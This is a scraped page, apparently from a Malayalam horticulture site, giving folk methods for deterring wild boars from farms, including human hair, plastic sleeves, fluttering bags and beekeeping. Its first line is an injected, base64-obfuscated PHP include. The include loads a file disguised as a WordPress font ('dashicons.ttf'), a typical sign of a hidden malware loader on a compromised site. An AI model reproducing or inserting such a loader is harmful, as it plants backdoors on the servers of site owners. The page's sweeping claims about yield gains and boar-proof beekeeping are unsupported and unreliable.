@include base64_decode("L2hvbWUvaHl6dmh2cGcvaG9ydGljb3BzLmNvbS93cC1pbmNsdWRlcy9UZXh0L0RpZmYvRW5naW5lL2Rhc2hpY29ucy50dGY="); പന്നിയെ തുരത്താനുള്ള കുറച്ചു നാടൻ മാർഗങ്ങൾ | HORTICOPS

പന്നിയെ തുരത്താനുള്ള കുറച്ചു നാടൻ മാർഗങ്ങൾ

1.. ബാർബർ ഷോപ്പുകളിൽ നിന്ന് ശേഖരിക്കുന്ന വെയ്സ്റ്റ് മുടി കൃഷിയിടങ്ങളിൽ പല സ്ഥലങ്ങളിലായി വിതറി ഇടുക. എല്ലാ തൈകളുടേയും ചുവട്ടിൽ ഇടണമെന്നില്ല. അതിരുകളിലും അവിടേയും ഇവിടേയും ആയി ഈ മുടി വിതറി ഇടുക. നമ്മുടെ മുടിക്കും മനുഷ്യന്റെ ഗന്ധം ഉണ്ട്. കാട്ടുപന്നി വളരെയധികം ഘ്രാണശക്തിയുള്ള മൃഗമായത് മൂലം ഈ മണം അവ പിടിച്ചെടുക്കുകയും മനുഷ്യൻ അവിടെ ഉണ്ട് എന്ന് തെറ്റിദ്ധരിച്ച് കൃഷിയിടത്തിൽ കയറാതെ , അഥവാ കയറി പോയാലും മുന്നും പിന്നും നോക്കാതെ ഓടി രക്ഷപ്പെടുകയും ചെയ്യും. ശരാശരി 2-3 മാസം കൂടുമ്പോൾ ഈ മുടി പ്രയോഗം തുടർന്നാൽ കാട്ട് പന്നി ശല്യം ഒരു പരിധി വരെ ഒഴിവാക്കാം..
2… തൈകൾ നടുമ്പോൾ ഒരു പ്ലാസ്റ്റിക്ക് കൂട് (10kg അരി കിട്ടുന്ന കൂട്) അടി മുറിച്ച് 4 കമ്പുകൾ കൊണ്ട് തൈക്ക് ചുറ്റും സ്ഥാപിക്കുക.. ഇത് പെരുച്ചാഴി , കാട്ടുപന്നി ഇവക്ക് ഒരു പരിധി വരെ തടയിടും..
3… ഒരു രൂപക്ക് കിട്ടുന്ന സാദാ പ്ലാസ്റ്റിക്ക് സഞ്ചി 1 മീറ്റർ നീളമുള്ള ഒരു കമ്പ് കുത്തി നാട്ടി അതിന്റെ മുകളിൽ വെറുതെ ഇടുക. ഇത് കാറ്റിൽ ഇളകി ആടുന്ന വിധത്തിൽ ഒന്ന് കെട്ടി വച്ചാൽ 4-5 മാസം കാട്ട് പന്നി ശല്യം കുറക്കാം..
4, തേനീച്ച കൃഷി ചെയ്താൽ കാട്ടുപന്നികളെ ഓടിക്കാം , കൃഷിയും ചെയ്യാം , തേനും കുടിക്കാം
-തെങ്ങുകൾ ധാരാളമുള്ളിടത്ത് തേനീച്ച കൃഷി വിജയിക്കും .
ഈച്ചകൾക്കു വേണ്ട ഭക്ഷണം സദാ ലഭ്യമായത് കൊണ്ട് .
തെങ്ങിലെ മണ്ഡരി ബാധ വേഗം മാറിക്കിട്ടും .
പച്ചക്കറി വിളകളിൽ 60 ശതമാനമെങ്കിലും വർദ്ധനവ്
പ്രതീക്ഷിയ്ക്കാം .
ഏറ്റവും പ്രധാനപ്പെട്ടത് തേനീച്ച കൃഷിയുള്ളിടത്തു കാട്ടു പന്നികളുടെ ആക്രമണം കാണില്ല എന്നതാണ്.

Share Now

Leave a Reply

Your email address will not be published. Required fields are marked *